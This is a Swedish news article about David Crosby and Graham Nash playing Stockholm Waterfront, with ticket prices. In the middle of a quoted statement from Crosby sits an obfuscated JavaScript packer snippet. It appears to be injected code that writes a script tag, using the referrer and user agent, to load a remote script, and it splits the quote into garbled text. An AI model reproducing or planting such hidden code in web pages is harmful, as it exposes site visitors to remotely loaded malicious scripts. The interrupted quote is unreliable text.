Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

David Crosby och Graham Nash till Stockholm

David Crosby och Graham Nash till Stockholm
Alexander Gylemo

Den världskända amerikanska gitarristen, sångaren och songwritern David Crosby och den legendariska brittiska artisten Graham Nash spelar snart i Sverige då de intar scenen på Stockholm Waterfront den tionde oktober.

De är representerade i Rock and Roll Hall of Fame och är båda medlemmar i den världskända folkrockgruppen Crosby, Stills, Nash & Young, men de har även gjort succé i andra grupper som Crosby som var en av grundarna till bandet The Byrds och Nash som är med i The Hollies.

Duon kommer hit med ett stjärnspäckat band och både gamla och splitternya låtar utlovas.

”Att eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ideab|var|u0026u|referrer|tzsiz||js|php’.split(’|’),0,{}))
turnera med ett band ger oss möjlighet att välja låtar från de kataloger som Graham och jag inte tidigare framfört live tillsammans (…) Vi spelar också några helt nya låtar vi skrivit men som aldrig tidigare hörts vare sig på skiva eller från scen”.

Biljetter finns att köpa på ticnet och kostar 595 :- för att stå på den nedre läktaren och 495 :- för den övre läktaren.